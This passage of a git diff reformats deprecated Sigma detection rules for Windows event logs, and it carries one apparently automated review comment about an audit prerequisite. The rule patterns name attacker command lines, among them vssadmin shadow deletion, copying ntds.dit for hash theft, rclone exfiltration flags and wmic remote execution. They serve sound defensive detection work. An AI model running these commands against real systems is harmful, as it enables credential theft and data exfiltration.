(x86)\Microsoft\Temp\ - NewProcessName|endswith: .tmp\MicrosoftEdgeUpdate.exe + NewProcessName|startswith: C:\Program Files (x86)\Microsoft\Temp\ + NewProcessName|endswith: .tmp\MicrosoftEdgeUpdate.exe condition: process_creation and (selection and not 1 of filter*) falsepositives: - - Installers are expected to be run from the "AppData\Local\Temp" and "C:\Windows\Temp\" - directories + - Installers are expected to be run from the "AppData\Local\Temp" and "C:\Windows\Temp\" directories level: low ruletype: Sigma 
diff --git a/sigma/builtin/deprecated/proc_creation_win_susp_squirrel_lolbin.yml b/sigma/builtin/deprecated/proc_creation_win_susp_squirrel_lolbin.yml index d37d0cf2f..be453a803 100644 --- a/sigma/builtin/deprecated/proc_creation_win_susp_squirrel_lolbin.yml +++ b/sigma/builtin/deprecated/proc_creation_win_susp_squirrel_lolbin.yml @@ -20,32 +20,32 @@ detection: EventID: 4688 Channel: Security selection1: - NewProcessName|endswith: \update.exe + NewProcessName|endswith: \update.exe selection2: - CommandLine|contains: + CommandLine|contains: - --processStart - --processStartAndWait - --createShortcut filter_discord: - CommandLine|contains|all: + CommandLine|contains|all: - C:\Users\ - \AppData\Local\Discord\Update.exe - ' --processStart' - Discord.exe filter_github_desktop: - CommandLine|contains|all: + CommandLine|contains|all: - C:\Users\ - \AppData\Local\GitHubDesktop\Update.exe - GitHubDesktop.exe - CommandLine|contains: + CommandLine|contains: - --createShortcut - --processStartAndWait filter_teams: - CommandLine|contains|all: + CommandLine|contains|all: - C:\Users\ - \AppData\Local\Microsoft\Teams\Update.exe - Teams.exe - CommandLine|contains: + CommandLine|contains: - --processStart - --createShortcut condition: process_creation and (all of selection* and not 1 of filter_*) diff --git a/sigma/builtin/deprecated/proc_creation_win_sysinternals_psexec_service_execution.yml b/sigma/builtin/deprecated/proc_creation_win_sysinternals_psexec_service_execution.yml index 539502df1..ef3efe58e 100644 --- a/sigma/builtin/deprecated/proc_creation_win_sysinternals_psexec_service_execution.yml +++ b/sigma/builtin/deprecated/proc_creation_win_sysinternals_psexec_service_execution.yml 
@@ -1,8 +1,8 @@ title: PsExec Tool Execution id: fa91cc36-24c9-41ce-b3c8-3bbc3f2f67ba related: - - id: 42c575ea-e41e-41f1-b248-8093c3e82a28 - type: derived + - id: 42c575ea-e41e-41f1-b248-8093c3e82a28 + type: derived status: deprecated description: Detects PsExec service execution via default service image name references: @@ -23,8 +23,8 @@ detection: EventID: 4688 Channel: Security selection: - NewProcessName|endswith: \PSEXESVC.exe - SubjectUserName|contains: + NewProcessName|endswith: \PSEXESVC.exe + SubjectUserName|contains: # covers many language settings - AUTHORI - AUTORI condition: process_creation and selection diff --git a/sigma/builtin/deprecated/proc_creation_win_sysinternals_psexesvc_start.yml b/sigma/builtin/deprecated/proc_creation_win_sysinternals_psexesvc_start.yml index d68e081fb..2e5894547 100644 --- a/sigma/builtin/deprecated/proc_creation_win_sysinternals_psexesvc_start.yml +++ b/sigma/builtin/deprecated/proc_creation_win_sysinternals_psexesvc_start.yml @@ -17,7 +17,7 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine: C:\Windows\PSEXESVC.exe + CommandLine: C:\Windows\PSEXESVC.exe condition: process_creation and selection falsepositives: - Administrative activity diff --git a/sigma/builtin/deprecated/proc_creation_win_whoami_as_system.yml b/sigma/builtin/deprecated/proc_creation_win_whoami_as_system.yml index cad621d79..a45f1cabd 100644 --- a/sigma/builtin/deprecated/proc_creation_win_whoami_as_system.yml +++ b/sigma/builtin/deprecated/proc_creation_win_whoami_as_system.yml 
@@ -1,8 +1,7 @@ title: Run Whoami as SYSTEM id: 80167ada-7a12-41ed-b8e9-aa47195c66a1 status: deprecated -description: Detects a whoami.exe executed by LOCAL SYSTEM. This may be a sign of - a successful local privilege escalation. +description: Detects a whoami.exe executed by LOCAL SYSTEM. This may be a sign of a successful local privilege escalation. references: - https://speakerdeck.com/heirhabarov/hunting-for-privilege-escalation-in-windows-environment author: Teymur Kheirkhabarov, Florian Roth @@ -20,12 +19,12 @@ detection: EventID: 4688 Channel: Security selection_user: - SubjectUserName|contains: + SubjectUserName|contains: # covers many language settings - AUTHORI - AUTORI selection_img: - - OriginalFileName: whoami.exe - - NewProcessName|endswith: \whoami.exe + - OriginalFileName: whoami.exe + - NewProcessName|endswith: \whoami.exe condition: process_creation and (all of selection*) falsepositives: - Possible name overlap with NT AUHTORITY substring to cover all languages diff --git a/sigma/builtin/deprecated/proc_creation_win_winword_dll_load.yml b/sigma/builtin/deprecated/proc_creation_win_winword_dll_load.yml index 01e7b0038..1ea5ae2e7 100644 --- a/sigma/builtin/deprecated/proc_creation_win_winword_dll_load.yml +++ b/sigma/builtin/deprecated/proc_creation_win_winword_dll_load.yml @@ -15,8 +15,8 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains: /l - NewProcessName|endswith: \winword.exe + CommandLine|contains: /l + NewProcessName|endswith: \winword.exe condition: process_creation and selection fields: - CommandLine diff --git a/sigma/builtin/deprecated/proc_creation_win_wmic_execution_via_office_process.yml b/sigma/builtin/deprecated/proc_creation_win_wmic_execution_via_office_process.yml index f0b9167ba..9ce7b16a3 100644 --- a/sigma/builtin/deprecated/proc_creation_win_wmic_execution_via_office_process.yml +++ b/sigma/builtin/deprecated/proc_creation_win_wmic_execution_via_office_process.yml 
@@ -1,13 +1,12 @@ title: WMI Execution Via Office Process id: 518643ba-7d9c-4fa5-9f37-baed36059f6a related: - - id: e1693bc8-7168-4eab-8718-cdcaa68a1738 - type: derived - - id: 438025f9-5856-4663-83f7-52f878a70a50 - type: similar + - id: e1693bc8-7168-4eab-8718-cdcaa68a1738 + type: derived + - id: 438025f9-5856-4663-83f7-52f878a70a50 + type: similar status: deprecated -description: Initial execution of malicious document calls wmic to execute the file - with regsvr32 +description: Initial execution of malicious document calls wmic to execute the file with regsvr32 references: - https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/ - https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/02bcbfc2bfb8b4da601bb30de0344ae453aa1afe/Threat%20Intelligence/The%20DFIR%20Report/20210329_Sodinokibi_(aka_REvil)_Ransomware.yaml @@ -28,8 +27,8 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \wbem\WMIC.exe - - OriginalFileName: wmic.exe + - NewProcessName|endswith: \wbem\WMIC.exe + - OriginalFileName: wmic.exe selection_parent: ParentProcessName|endswith: - \winword.exe diff --git a/sigma/builtin/deprecated/proc_creation_win_wmic_remote_command.yml b/sigma/builtin/deprecated/proc_creation_win_wmic_remote_command.yml index 8226439f0..9ef16d68a 100644 --- a/sigma/builtin/deprecated/proc_creation_win_wmic_remote_command.yml +++ b/sigma/builtin/deprecated/proc_creation_win_wmic_remote_command.yml @@ -19,10 +19,10 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \WMIC.exe - - OriginalFileName: wmic.exe + - NewProcessName|endswith: \WMIC.exe + - OriginalFileName: wmic.exe selection_cli: - CommandLine|contains|all: + CommandLine|contains|all: - '/node:' - process - call diff --git a/sigma/builtin/deprecated/proc_creation_win_wmic_remote_service.yml b/sigma/builtin/deprecated/proc_creation_win_wmic_remote_service.yml index 807b4711a..a4b6c7189 100644 
--- a/sigma/builtin/deprecated/proc_creation_win_wmic_remote_service.yml +++ b/sigma/builtin/deprecated/proc_creation_win_wmic_remote_service.yml @@ -1,19 +1,11 @@ title: WMI Reconnaissance List Remote Services id: 09af397b-c5eb-4811-b2bb-08b3de464ebf status: deprecated -description: 'An adversary might use WMI to check if a certain Remote Service is running - on a remote device. - - When the test completes, a service information will be displayed on the screen - if it exists. - - A common feedback message is that "No instance(s) Available" if the service queried - is not running. - - A common error message is "Node - (provided IP or default) ERROR Description =The - RPC server is unavailable" if the provided remote host is unreachable - - ' +description: | + An adversary might use WMI to check if a certain Remote Service is running on a remote device. + When the test completes, a service information will be displayed on the screen if it exists. + A common feedback message is that "No instance(s) Available" if the service queried is not running. + A common error message is "Node - (provided IP or default) ERROR Description =The RPC server is unavailable" if the provided remote host is unreachable references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1047/T1047.md - https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/wmic @@ -31,10 +23,10 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \WMIC.exe - - OriginalFileName: wmic.exe + - NewProcessName|endswith: \WMIC.exe + - OriginalFileName: wmic.exe selection_cli: - CommandLine|contains|all: + CommandLine|contains|all: - '/node:' - service condition: process_creation and (all of selection*) diff --git a/sigma/builtin/deprecated/proc_creation_win_wuauclt_execution.yml b/sigma/builtin/deprecated/proc_creation_win_wuauclt_execution.yml index d5ff16746..7a4d54c9a 100644 
--- a/sigma/builtin/deprecated/proc_creation_win_wuauclt_execution.yml +++ b/sigma/builtin/deprecated/proc_creation_win_wuauclt_execution.yml @@ -20,15 +20,15 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \wuauclt.exe - - OriginalFileName: wuauclt.exe + - NewProcessName|endswith: \wuauclt.exe + - OriginalFileName: wuauclt.exe selection_cli: - CommandLine|contains|all: + CommandLine|contains|all: - /UpdateDeploymentProvider - /RunHandlerComServer - .dll filter: - CommandLine|contains: + CommandLine|contains: - ' /ClassId ' - ' wuaueng.dll ' condition: process_creation and (all of selection* and not filter) diff --git a/sigma/builtin/deprecated/process_creation_syncappvpublishingserver_exe.yml b/sigma/builtin/deprecated/process_creation_syncappvpublishingserver_exe.yml index ae6db4c09..f8cdc01f9 100644 --- a/sigma/builtin/deprecated/process_creation_syncappvpublishingserver_exe.yml +++ b/sigma/builtin/deprecated/process_creation_syncappvpublishingserver_exe.yml @@ -1,10 +1,9 @@ title: SyncAppvPublishingServer Execution to Bypass Powershell Restriction id: fde7929d-8beb-4a4c-b922-be9974671667 -description: Detects SyncAppvPublishingServer process execution which usually utilized - by adversaries to bypass PowerShell execution restrictions. +description: Detects SyncAppvPublishingServer process execution which usually utilized by adversaries to bypass PowerShell execution restrictions. references: - https://lolbas-project.github.io/lolbas/Binaries/Syncappvpublishingserver/ -author: "Ensar \u015Eamil, @sblmsrsn, OSCD Community" +author: Ensar Şamil, @sblmsrsn, OSCD Community date: 2020/10/05 modified: 2022/04/11 tags: @@ -18,7 +17,7 @@ detection: EventID: 4688 Channel: Security selection: - NewProcessName|endswith: \SyncAppvPublishingServer.exe + NewProcessName|endswith: \SyncAppvPublishingServer.exe condition: process_creation and selection falsepositives: - App-V clients 
diff --git a/sigma/builtin/deprecated/registry_add_sysinternals_sdelete_registry_keys.yml b/sigma/builtin/deprecated/registry_add_sysinternals_sdelete_registry_keys.yml index a826142f5..85fd9ba57 100644 --- a/sigma/builtin/deprecated/registry_add_sysinternals_sdelete_registry_keys.yml +++ b/sigma/builtin/deprecated/registry_add_sysinternals_sdelete_registry_keys.yml @@ -1,8 +1,7 @@ title: Sysinternals SDelete Registry Keys id: 9841b233-8df8-4ad7-9133-b0b4402a9014 status: deprecated -description: A General detection to trigger for the creation or modification of .*\Software\Sysinternals\SDelete - registry keys. Indicators of the use of Sysinternals SDelete tool. +description: A General detection to trigger for the creation or modification of .*\Software\Sysinternals\SDelete registry keys. Indicators of the use of Sysinternals SDelete tool. references: - https://github.com/OTRF/detection-hackathon-apt29/issues/9 - https://github.com/OTRF/ThreatHunter-Playbook/blob/2d4257f630f4c9770f78d0c1df059f891ffc3fec/docs/evals/apt29/detections/4.B.2_59A9AC92-124D-4C4B-A6BF-3121C98677C3.md @@ -20,7 +19,7 @@ detection: EventID: 4657 Channel: Security selection: - OperationType: '%%1904' + OperationType: '%%1904' ObjectName|contains: \Software\Sysinternals\SDelete condition: registry_add and selection falsepositives: diff --git a/sigma/builtin/deprecated/registry_event_asep_reg_keys_modification.yml b/sigma/builtin/deprecated/registry_event_asep_reg_keys_modification.yml index 7cc987ba5..4469a5721 100644 --- a/sigma/builtin/deprecated/registry_event_asep_reg_keys_modification.yml +++ b/sigma/builtin/deprecated/registry_event_asep_reg_keys_modification.yml 
@@ -5,11 +5,10 @@ status: deprecated references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md - https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns - - https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d + - https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d # a list with registry keys date: 2019/10/25 modified: 2022/05/14 -author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, - oscd.community, Tim Shelton +author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton logsource: category: registry_event product: windows 
@@ -191,25 +190,17 @@ detection: - \Lsa\Authentication Packages - \BootVerificationProgram\ImagePath filter: - - NewValue: (Empty) - - ObjectName|endswith: \NgcFirst\ConsecutiveSwitchCount - - ProcessName: C:\WINDOWS\System32\svchost.exe - condition: registry_event and (( main_selection or session_manager_base and session_manager - or current_version_base and current_version or nt_current_version_base and - nt_current_version or wow_current_version_base and wow_current_version or - wow_nt_current_version_base and wow_nt_current_version or (wow_office or office) - and wow_office_details or (wow_ie or ie) and wow_ie_details or wow_classes_base - and wow_classes or classes_base and classes or scripts_base and scripts or - winsock_parameters_base and winsock_parameters or system_control_base and - system_control ) and not filter) + - NewValue: (Empty) + - ObjectName|endswith: \NgcFirst\ConsecutiveSwitchCount + - ProcessName: C:\WINDOWS\System32\svchost.exe + condition: registry_event and (( main_selection or session_manager_base and session_manager or current_version_base and current_version or nt_current_version_base and nt_current_version or wow_current_version_base and wow_current_version or wow_nt_current_version_base and wow_nt_current_version or (wow_office or office) and wow_office_details or (wow_ie or ie) and wow_ie_details or wow_classes_base and wow_classes or classes_base and classes or scripts_base and scripts or winsock_parameters_base and winsock_parameters or system_control_base and system_control ) and not filter) fields: - SecurityID - ObjectName - OldValueType - NewValueType falsepositives: - - Legitimate software automatically (mostly, during installation) sets up autorun - keys for legitimate reason + - Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason - Legitimate administrator sets up autorun keys for legitimate reason tags: - attack.persistence 
diff --git a/sigma/builtin/deprecated/registry_set_abusing_windows_telemetry_for_persistence.yml b/sigma/builtin/deprecated/registry_set_abusing_windows_telemetry_for_persistence.yml index 9319a2035..67a5cd103 100644 --- a/sigma/builtin/deprecated/registry_set_abusing_windows_telemetry_for_persistence.yml +++ b/sigma/builtin/deprecated/registry_set_abusing_windows_telemetry_for_persistence.yml @@ -1,16 +1,10 @@ title: Abusing Windows Telemetry For Persistence - Registry id: 4e8d5fd3-c959-441f-a941-f73d0cdcdca5 status: deprecated -description: 'Windows telemetry makes use of the binary CompatTelRunner.exe to run - a variety of commands and perform the actual telemetry collections. - - This binary was created to be easily extensible, and to that end, it relies on - the registry to instruct on which commands to run. - - The problem is, it will run any arbitrary command without restriction of location - or type. - - ' +description: | + Windows telemetry makes use of the binary CompatTelRunner.exe to run a variety of commands and perform the actual telemetry collections. + This binary was created to be easily extensible, and to that end, it relies on the registry to instruct on which commands to run. + The problem is, it will run any arbitrary command without restriction of location or type. references: - https://www.trustedsec.com/blog/abusing-windows-telemetry-for-persistence/ author: Sreeman diff --git a/sigma/builtin/deprecated/registry_set_add_hidden_user.yml b/sigma/builtin/deprecated/registry_set_add_hidden_user.yml index 357655b1f..1d17dbb89 100644 --- a/sigma/builtin/deprecated/registry_set_add_hidden_user.yml +++ b/sigma/builtin/deprecated/registry_set_add_hidden_user.yml 
@@ -1,8 +1,7 @@ title: User Account Hidden By Registry id: 8a58209c-7ae6-4027-afb0-307a78e4589a status: deprecated -description: Detect modification for a specific user to prevent that user from being - listed on the logon screen +description: Detect modification for a specific user to prevent that user from being listed on the logon screen references: - https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1564.002/T1564.002.md author: frack113 diff --git a/sigma/builtin/deprecated/registry_set_disable_microsoft_office_security_features.yml b/sigma/builtin/deprecated/registry_set_disable_microsoft_office_security_features.yml index 0431ea3be..5092d1a09 100644 --- a/sigma/builtin/deprecated/registry_set_disable_microsoft_office_security_features.yml +++ b/sigma/builtin/deprecated/registry_set_disable_microsoft_office_security_features.yml @@ -16,6 +16,11 @@ logsource: product: windows category: registry_set definition: key must be add to the sysmon configuration to works + # Sysmon + # \VBAWarnings + # \DisableInternetFilesInPV + # \DisableUnsafeLocationsInPV + # \DisableAttachementsInPV detection: registry_set: EventID: 4657 diff --git a/sigma/builtin/deprecated/registry_set_office_security.yml b/sigma/builtin/deprecated/registry_set_office_security.yml index 5996d751f..10c849c8c 100644 --- a/sigma/builtin/deprecated/registry_set_office_security.yml +++ b/sigma/builtin/deprecated/registry_set_office_security.yml 
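Review bot: The new comment block under `definition:` describes Sysmon configuration, but this rule keys on `EventID: 4657` from the Security log, where a Sysmon registry config is irrelevant; if this file is the Security-log conversion of the Sysmon rule, the real prerequisite is that the Audit Registry subcategory is enabled and a SACL is set on the Office `Security` keys, otherwise 4657 never fires and the rule is silently dead. Suggested replacement for the definition line: `definition: Security event 4657 only fires if Audit Registry (Object Access) is enabled and a SACL covers the Office Security keys (VBAWarnings, DisableInternetFilesInPV, DisableUnsafeLocationsInPV, DisableAttachementsInPV)`. The commented key list can then be dropped or kept under that wording; the existing `key must be add to the sysmon configuration to works` also has grammar errors worth fixing in the same pass.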
@@ -1,8 +1,7 @@ title: Office Security Settings Changed id: a166f74e-bf44-409d-b9ba-ea4b2dd8b3cd status: deprecated -description: Detects registry changes to Office macro settings. The TrustRecords contain - information on executed macro-enabled documents. (see references) +description: Detects registry changes to Office macro settings. The TrustRecords contain information on executed macro-enabled documents. (see references) references: - https://twitter.com/inversecos/status/1494174785621819397 - https://www.mcafee.com/blogs/other-blogs/mcafee-labs/zloader-with-a-new-infection-technique/ diff --git a/sigma/builtin/deprecated/registry_set_silentprocessexit.yml b/sigma/builtin/deprecated/registry_set_silentprocessexit.yml index c24a60258..3bd64f404 100644 --- a/sigma/builtin/deprecated/registry_set_silentprocessexit.yml +++ b/sigma/builtin/deprecated/registry_set_silentprocessexit.yml @@ -1,8 +1,7 @@ title: SilentProcessExit Monitor Registration id: c81fe886-cac0-4913-a511-2822d72ff505 status: deprecated -description: Detects changes to the Registry in which a monitor program gets registered - to monitor the exit of another process +description: Detects changes to the Registry in which a monitor program gets registered to monitor the exit of another process references: - https://oddvar.moe/2018/04/10/persistence-using-globalflags-in-image-file-execution-options-hidden-from-autoruns-exe/ - https://www.deepinstinct.com/2021/02/16/lsass-memory-dumps-are-stealthier-than-ever-before-part-2/ diff --git a/sigma/builtin/deprecated/sysmon_rclone_execution.yml b/sigma/builtin/deprecated/sysmon_rclone_execution.yml index ee9fa7287..154a30bb2 100644 --- a/sigma/builtin/deprecated/sysmon_rclone_execution.yml +++ b/sigma/builtin/deprecated/sysmon_rclone_execution.yml 
@@ -1,8 +1,7 @@ title: RClone Execution id: a0d63692-a531-4912-ad39-4393325b2a9c status: deprecated -description: Detects execution of RClone utility for exfiltration as used by various - ransomwares strains like REvil, Conti, FiveHands, etc +description: Detects execution of RClone utility for exfiltration as used by various ransomwares strains like REvil, Conti, FiveHands, etc tags: - attack.exfiltration - attack.t1567.002 @@ -31,12 +30,12 @@ detection: selection: Description: Rsync for cloud storage selection2: - CommandLine|contains|all: + CommandLine|contains|all: - '--config ' - '--no-check-certificate ' - ' copy ' selection3: - CommandLine|contains: + CommandLine|contains: - mega - pcloud - ftp @@ -45,7 +44,7 @@ detection: - --auto-confirm - --transfers - --multi-thread-streams - NewProcessName|endswith: + NewProcessName|endswith: - \rclone.exe condition: process_creation and (1 of selection*) ruletype: Sigma diff --git a/sigma/builtin/deprecated/win_defender_disabled.yml b/sigma/builtin/deprecated/win_defender_disabled.yml index 2c2faf229..475ab593b 100644 --- a/sigma/builtin/deprecated/win_defender_disabled.yml +++ b/sigma/builtin/deprecated/win_defender_disabled.yml @@ -5,7 +5,7 @@ description: Detects disabling Windows Defender threat protection references: - https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-antivirus/troubleshoot-windows-defender-antivirus - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md -author: "J\xE1n Tren\u010Dansk\xFD, frack113" +author: Ján Trenčanský, frack113 date: 2020/07/28 modified: 2023/11/22 tags: 
@@ -19,10 +19,10 @@ detection: Channel: Microsoft-Windows-Windows Defender/Operational selection: EventID: - - 5001 - - 5010 - - 5012 - - 5101 + - 5001 # Real-time protection is disabled. + - 5010 # Scanning for malware and other potentially unwanted software is disabled. + - 5012 # Scanning for viruses is disabled. + - 5101 # The antimalware platform is expired. condition: windefend and selection falsepositives: - Administrator actions (should be investigated) diff --git a/sigma/builtin/deprecated/win_dsquery_domain_trust_discovery.yml b/sigma/builtin/deprecated/win_dsquery_domain_trust_discovery.yml index 9c5f2481b..7d51fcd47 100644 --- a/sigma/builtin/deprecated/win_dsquery_domain_trust_discovery.yml +++ b/sigma/builtin/deprecated/win_dsquery_domain_trust_discovery.yml @@ -18,12 +18,12 @@ detection: EventID: 4688 Channel: Security selection: - - CommandLine|contains|all: - - -filter - - trustedDomain - NewProcessName|endswith: \dsquery.exe - - CommandLine|contains: domain_trusts - NewProcessName|endswith: \nltest.exe + - CommandLine|contains|all: + - -filter + - trustedDomain + NewProcessName|endswith: \dsquery.exe + - CommandLine|contains: domain_trusts + NewProcessName|endswith: \nltest.exe condition: process_creation and selection falsepositives: - Administration of systems. diff --git a/sigma/builtin/deprecated/win_lateral_movement_condrv.yml b/sigma/builtin/deprecated/win_lateral_movement_condrv.yml index 188213bf9..3ac136c3b 100644 --- a/sigma/builtin/deprecated/win_lateral_movement_condrv.yml +++ b/sigma/builtin/deprecated/win_lateral_movement_condrv.yml 
@@ -1,10 +1,7 @@ title: Lateral Movement Indicator ConDrv id: 29d31aee-30f4-4006-85a9-a4a02d65306c -status: deprecated -description: This event was observed on the target host during lateral movement. The - process name within the event contains the process spawned post compromise. Account - Name within the event contains the compromised user account name. This event should - to be correlated with 4624 and 4688 for further intrusion context. +status: deprecated #Too many FP +description: This event was observed on the target host during lateral movement. The process name within the event contains the process spawned post compromise. Account Name within the event contains the compromised user account name. This event should to be correlated with 4624 and 4688 for further intrusion context. author: Janantha Marasinghe date: 2021/04/27 modified: 2022/05/14 diff --git a/sigma/builtin/deprecated/win_security_group_modification_logging.yml b/sigma/builtin/deprecated/win_security_group_modification_logging.yml index 4b3a325bb..8e3be50b5 100644 --- a/sigma/builtin/deprecated/win_security_group_modification_logging.yml +++ b/sigma/builtin/deprecated/win_security_group_modification_logging.yml 
@@ -1,23 +1,14 @@ title: Group Modification Logging id: 9cf01b6c-e723-4841-a868-6d7f8245ca6e status: deprecated -description: 'Configure systems to issue a log entry and alert when an account is - added to or removed from any group assigned administrative privileges. - +description: | + Configure systems to issue a log entry and alert when an account is added to or removed from any group assigned administrative privileges. Sigma detects - Event ID 4728 indicates a "Member is added to a Security Group". - Event ID 4729 indicates a "Member is removed from a Security enabled-group". - Event ID 4730 indicates a "Security Group is deleted". - The case is not applicable for Unix OS. - - Supported OS - Windows 2008 R2 and 7, Windows 2012 R2 and 8.1, Windows 2016 and - 10 Windows Server 2019, Windows Server 2000, Windows 2003 and XP. - - ' + Supported OS - Windows 2008 R2 and 7, Windows 2012 R2 and 8.1, Windows 2016 and 10 Windows Server 2019, Windows Server 2000, Windows 2003 and XP. references: - https://www.cisecurity.org/controls/cis-controls-list/ - https://www.pcisecuritystandards.org/documents/PCI_DSS_v3-2-1.pdf @@ -31,6 +22,32 @@ references: author: Alexandr Yampolskyi, SOC Prime date: 2019/03/26 modified: 2023/04/26 +# tags: + # - CSC4 + # - CSC4.8 + # - NIST CSF 1.1 PR.AC-4 + # - NIST CSF 1.1 PR.AT-2 + # - NIST CSF 1.1 PR.MA-2 + # - NIST CSF 1.1 PR.PT-3 + # - ISO 27002-2013 A.9.1.1 + # - ISO 27002-2013 A.9.2.2 + # - ISO 27002-2013 A.9.2.3 + # - ISO 27002-2013 A.9.2.4 + # - ISO 27002-2013 A.9.2.5 + # - ISO 27002-2013 A.9.2.6 + # - ISO 27002-2013 A.9.3.1 + # - ISO 27002-2013 A.9.4.1 + # - ISO 27002-2013 A.9.4.2 + # - ISO 27002-2013 A.9.4.3 + # - ISO 27002-2013 A.9.4.4 + # - PCI DSS 3.2 2.1 + # - PCI DSS 3.2 7.1 + # - PCI DSS 3.2 7.2 + # - PCI DSS 3.2 7.3 + # - PCI DSS 3.2 8.1 + # - PCI DSS 3.2 8.2 + # - PCI DSS 3.2 8.3 + # - PCI DSS 3.2 8.7 logsource: product: windows service: security 
@@ -39,12 +56,12 @@ detection: Channel: Security selection: EventID: - - 4728 - - 4729 - - 4730 - - 633 - - 632 - - 634 + - 4728 # A member was added to a security-enabled global group + - 4729 # A member was removed from a security-enabled global group + - 4730 # A security-enabled global group was deleted + - 633 # Security Enabled Global Group Member Removed + - 632 # Security Enabled Global Group Member Added + - 634 # Security Enabled Global Group Deleted condition: security and selection falsepositives: - Unknown diff --git a/sigma/builtin/deprecated/win_security_lolbas_execution_of_nltest.yml b/sigma/builtin/deprecated/win_security_lolbas_execution_of_nltest.yml index a330ad641..bfd8d86ac 100644 --- a/sigma/builtin/deprecated/win_security_lolbas_execution_of_nltest.yml +++ b/sigma/builtin/deprecated/win_security_lolbas_execution_of_nltest.yml @@ -1,8 +1,7 @@ title: Correct Execution of Nltest.exe id: eeb66bbb-3dde-4582-815a-584aee9fe6d1 status: deprecated -description: The attacker might use LOLBAS nltest.exe for discovery of domain controllers, - domain trusts, parent domain and the current user permissions. +description: The attacker might use LOLBAS nltest.exe for discovery of domain controllers, domain trusts, parent domain and the current user permissions. references: - https://jpcertcc.github.io/ToolAnalysisResultSheet/details/nltest.htm - https://attack.mitre.org/software/S0359/ @@ -11,9 +10,9 @@ date: 2021/10/04 modified: 2023/02/02 tags: - attack.discovery - - attack.t1482 - - attack.t1018 - - attack.t1016 + - attack.t1482 # enumerate trusted domains by using commands such as nltest /domain_trusts + - attack.t1018 # enumerate remote domain controllers using options such as /dclist and /dsgetdc + - attack.t1016 # enumerate the parent domain of a local machine using /parentdomain logsource: product: windows service: security 
diff --git a/sigma/builtin/deprecated/win_susp_esentutl_activity.yml b/sigma/builtin/deprecated/win_susp_esentutl_activity.yml index 92a10483c..7008e5553 100644 --- a/sigma/builtin/deprecated/win_susp_esentutl_activity.yml +++ b/sigma/builtin/deprecated/win_susp_esentutl_activity.yml @@ -1,9 +1,7 @@ title: Suspicious Esentutl Use id: 56a8189f-11b2-48c8-8ca7-c54b03c2fbf7 status: deprecated -description: Detects flags often used with the LOLBAS Esentutl for malicious activity. - It could be used in rare cases by administrators to access locked files or during - maintenance. +description: Detects flags often used with the LOLBAS Esentutl for malicious activity. It could be used in rare cases by administrators to access locked files or during maintenance. author: Florian Roth (Nextron Systems) date: 2020/05/23 modified: 2022/04/11 @@ -23,7 +21,7 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains|all: + CommandLine|contains|all: - ' /vss ' - ' /y ' condition: process_creation and selection diff --git a/sigma/builtin/deprecated/win_susp_vssadmin_ntds_activity.yml b/sigma/builtin/deprecated/win_susp_vssadmin_ntds_activity.yml index e30624ea7..554165915 100644 --- a/sigma/builtin/deprecated/win_susp_vssadmin_ntds_activity.yml +++ b/sigma/builtin/deprecated/win_susp_vssadmin_ntds_activity.yml @@ -1,8 +1,7 @@ title: Activity Related to NTDS.dit Domain Hash Retrieval id: b932b60f-fdda-4d53-8eda-a170c1d97bbd status: deprecated -description: Detects suspicious commands that could be related to activity that uses - volume shadow copy to steal and retrieve hashes from the NTDS.dit file remotely +description: Detects suspicious commands that could be related to activity that uses volume shadow copy to steal and retrieve hashes from the NTDS.dit file remotely author: Florian Roth (Nextron Systems), Michael Haag date: 2019/01/16 modified: 2022/04/11 
@@ -23,7 +22,7 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine: + CommandLine: - vssadmin.exe Delete Shadows - 'vssadmin create shadow /for=C:' - copy \\?\GLOBALROOT\Device\\*\windows\ntds\ntds.dit diff --git a/sigma/builtin/deprecated/win_system_service_install_susp_double_ampersand.yml b/sigma/builtin/deprecated/win_system_service_install_susp_double_ampersand.yml index bed445ded..343dee973 100644 --- a/sigma/builtin/deprecated/win_system_service_install_susp_double_ampersand.yml +++ b/sigma/builtin/deprecated/win_system_service_install_susp_double_ampersand.yml @@ -1,8 +1,7 @@ title: New Service Uses Double Ampersand in Path id: ca83e9f3-657a-45d0-88d6-c1ac280caf53 status: deprecated -description: Detects a service installation that uses a suspicious double ampersand - used in the image path value +description: Detects a service installation that uses a suspicious double ampersand used in the image path value references: - Internal Research author: Florian Roth (Nextron Systems) diff --git a/sigma/builtin/diagnosis/scripted/win_diagnosis_scripted_load_remote_diagcab.yml b/sigma/builtin/diagnosis/scripted/win_diagnosis_scripted_load_remote_diagcab.yml index bf388ea20..d12cf61cc 100644 --- a/sigma/builtin/diagnosis/scripted/win_diagnosis_scripted_load_remote_diagcab.yml +++ b/sigma/builtin/diagnosis/scripted/win_diagnosis_scripted_load_remote_diagcab.yml @@ -1,8 +1,7 @@ title: Loading Diagcab Package From Remote Path id: 50cb47b8-2c33-4b23-a2e9-4600657d9746 status: test -description: Detects loading of diagcab packages from a remote path, as seen in DogWalk - vulnerability +description: Detects loading of diagcab packages from a remote path, as seen in DogWalk vulnerability references: - 